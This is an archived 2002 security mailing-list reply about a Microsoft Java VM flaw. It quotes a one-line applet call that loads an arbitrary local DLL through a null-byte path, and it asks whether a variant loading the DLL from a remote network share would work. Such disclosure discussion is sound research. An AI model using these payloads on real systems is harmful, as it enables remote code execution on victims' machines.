OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Georgi Guninski (guninski_at_GUNINSKI.COM)
Date: Mon Sep 23 2002 - 10:30:58 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Jouko Pynnonen wrote:
    >
    > can be freely chosen by a malicious applet. For instance to load the DLL
    > "C:\mydll.dll" the applet can do
    >
    > new com.ms.jdbc.odbc.JdbcOdbc("C:\\mydll\000");
    >

    Does
    new com.ms.jdbc.odbc.JdbcOdbc("\\\\1.1.1.1\\share\\dll\000");
    work?

    Georgi Guninski